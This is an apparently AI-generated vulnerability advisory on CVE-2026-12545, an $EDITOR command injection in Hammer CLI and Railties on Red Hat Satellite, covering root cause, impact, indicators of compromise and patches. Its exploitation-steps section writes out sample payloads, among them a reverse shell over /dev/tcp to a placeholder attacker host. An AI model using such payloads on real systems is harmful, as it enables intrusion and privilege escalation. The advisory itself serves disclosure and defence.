CVE-2026-12545: 
Ruby vulnerability analysis and mitigation

Overview

CVE-2026-12545 is a command injection vulnerability in rubygem-hammer_cli (Hammer CLI) and the Railties (Ruby on Rails) component distributed with Red Hat Satellite. The flaw arises from insecure interpolation of the $EDITOR environment variable into Ruby's system() method, allowing shell metacharacters (e.g., ;, |, &) to be interpreted by /bin/sh. It was reported on June 17, 2026, and patches were published on October 1, 2026. Affected products include rubygem-hammer_cli versions prior to 3.12.0-2.el8sat, 3.12.0-2.el9sat, 3.14.0-2.el9sat, 3.16.0-2.el9sat, and 3.18.0-2.el9sat, as shipped with Red Hat Satellite 6.16–6.19. It carries a CVSS v3.1 base score of 6.7 (Medium/High) (Red Hat CVE, GitHub Advisory).

Technical details

The root cause is CWE-78 (Improper Neutralization of Special Elements used in an OS Command). In lib/hammer_cli/utils.rb, the open_in_editor method executes system("#{ENV['EDITOR'] || 'vi'} #{f.path}"), passing a single interpolated string to system(), which causes Ruby to invoke /bin/sh -c and interpret any shell metacharacters embedded in the $EDITOR value. The same pattern exists in railties-7.0.10/lib/rails/commands/encrypted/encrypted_command.rb and secrets_command.rb. Exploitation requires local access, low privileges, and user interaction (e.g., triggering an editor invocation), making the attack complexity high. The Railties version in use (7.0.10) is End-of-Life and will not receive upstream patches, requiring manual remediation (Red Hat Bugzilla, Red Hat CVE).

Impact

Successful exploitation allows a local attacker with low privileges to execute arbitrary OS commands within the Hammer CLI process's effective security context, resulting in high confidentiality, integrity, and availability impact. If Hammer CLI is invoked with elevated permissions (e.g., via sudo with environment preservation), exploitation can lead to full root-level privilege escalation. Malicious activities executed through this vector may appear to originate from the application itself, complicating forensic attribution (Red Hat CVE, Red Hat Bugzilla).

Exploitability

There is no public proof-of-concept exploit and no evidence of in-the-wild exploitation as of the disclosure date (Red Hat CVE). The vulnerability is not listed in the CISA Known Exploited Vulnerabilities catalog. The EPSS score is approximately 0.505%, indicating a low probability of exploitation in the near term. The attack is not automatable (per NVD SSVC assessment) due to the requirement for local access and user interaction (GitHub Advisory).

Exploitation steps

  1. Gain local access: Obtain a low-privilege local account on a system running Hammer CLI (e.g., a Red Hat Satellite server or a host with rubygem-hammer_cli installed).
  2. Identify an editor-triggering command: Determine which Hammer CLI commands invoke the open_in_editor method (e.g., commands that open a file for interactive editing).
  3. Craft a malicious $EDITOR value: Set the $EDITOR environment variable to a payload containing shell metacharacters, such as EDITOR='vi; id > /tmp/pwned' or EDITOR='vi | /bin/bash -i >& /dev/tcp/attacker/4444 0>&1'.
  4. Trigger the vulnerable code path: Execute the Hammer CLI command that calls open_in_editor, causing system("#{ENV['EDITOR'] || 'vi'} #{f.path}") to be evaluated with the malicious $EDITOR value.
  5. Achieve arbitrary command execution: The shell interprets the metacharacters, executing the injected command with the privileges of the Hammer CLI process. If run under sudo -E, this results in root-level command execution (Red Hat Bugzilla, Red Hat CVE).

Indicators of compromise

  • Process: Unexpected child processes spawned by the Hammer CLI Ruby process (e.g., /bin/sh, /bin/bash, curl, wget, nc) with unusual arguments or network connections.
  • File System: Unexpected files created in world-writable directories (e.g., /tmp/) by the Hammer CLI process; new cron jobs or SSH authorized keys added by the Satellite service account.
  • Logs: Shell history or audit logs (/var/log/audit/audit.log) showing system() calls with unusual $EDITOR values containing metacharacters (;, |, &); auditd records of unexpected execve syscalls from the Hammer CLI process.
  • Environment: Presence of a non-standard $EDITOR environment variable containing shell metacharacters in process environment listings (/proc/<pid>/environ).

Mitigation and workarounds

Red Hat has released patched versions of rubygem-hammer_cli across multiple Satellite releases: 3.12.0-2.el8sat / 3.12.0-2.el9sat (Satellite 6.16), 3.14.0-2.el9sat (Satellite 6.17), 3.16.0-2.el9sat (Satellite 6.18), and 3.18.0-2.el9sat (Satellite 6.19), delivered via RHSA-2026:74503, RHSA-2026:74504, RHSA-2026:74505, and RHSA-2026:74506. Red Hat notes that no configuration-based mitigation meeting their deployment criteria is available; upgrading to a patched package is the recommended remediation. As a defensive measure, administrators should restrict or sanitize the $EDITOR environment variable, avoid running Hammer CLI with sudo -E, and consider replacing system() string interpolation with array-based argument passing in custom scripts (Red Hat Errata RHSA-2026:74503, Red Hat Errata RHSA-2026:74504, Red Hat CVE).

Community reactions

The vulnerability was discovered internally by Laura Pardo and Toni Gornals of Red Hat, and was disclosed as part of a broader Satellite security update addressing multiple command injection and privilege escalation issues. No notable external researcher commentary or significant social media discussion has been identified beyond standard CVE tracking and aggregator coverage (Red Hat CVE).

Additional resources

Linux Distribution fix status

Fix availability across major Linux distributions and their releases.

RHEL / CentOS

Unknown

Source: This report was generated using AI

Related Ruby vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55107CRITICAL10
  • Ruby logoRuby
  • kobako
NoYesSep 30, 2026
CVE-2026-67989HIGH7.5
  • Ruby logoRuby
  • ruby_llm
NoYesOct 02, 2026
CVE-2026-67987HIGH7.5
  • Ruby logoRuby
  • ruby_llm
NoYesSep 29, 2026
CVE-2026-12545MEDIUM6.7
  • Ruby logoRuby
  • hammer_cli
NoYesOct 01, 2026
GHSA-mwm8-39rw-8826MEDIUM6.3
  • Ruby logoRuby
  • sqlite3
NoYesOct 02, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management